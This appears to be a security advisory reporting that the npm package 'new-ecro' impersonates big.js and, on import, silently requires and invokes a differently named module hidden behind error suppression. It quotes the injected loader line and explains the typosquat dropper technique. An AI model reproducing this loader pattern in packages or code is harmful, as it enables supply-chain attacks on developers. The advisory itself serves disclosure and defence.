MAL-2026-6197

Malicious code in new-ecro (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7492a140547cea0957bc705d365e19806091462a249c3d5c90b6bfe91e8431c7)

Package 'new-ecro' impersonates the legitimate 'big.js' library: it copies big.js's README, source, version banner ('big.js v7.0.1'), author email, and repository URL while being published under an unrelated name.

On require()/import of the main entry, big.js:606-609 (and the same lines in big.mjs) execute `try { const doc = require("parket-slot"); doc.from_str().then(e=>{}).catch(e=>{}) } catch (error) {}` — a silent loader-and-invoker wrapped in an error-swallowing try/catch so failures are invisible to the caller. The package's declared dependency in package.json is `new-solt@0.0.8`, while the code requires `parket-slot` — a name mismatch that hides the actual executing module from casual inspection of new-ecro's manifest; new-solt transitively delivers parket-slot.

A developer who installs new-ecro believing it is big.js, or whose dependency tree pulls it in, executes attacker-controlled third-party code at import time. The combination of metadata spoofing of a popular library, a silent runtime require of a different-named module than declared, and unconditional error suppression is a canonical malicious-typosquat dropper pattern.

Affected packages

npm / new-ecro

No fixed version published yet for new-ecro (npm). Pin to a known-safe version or switch to an alternative.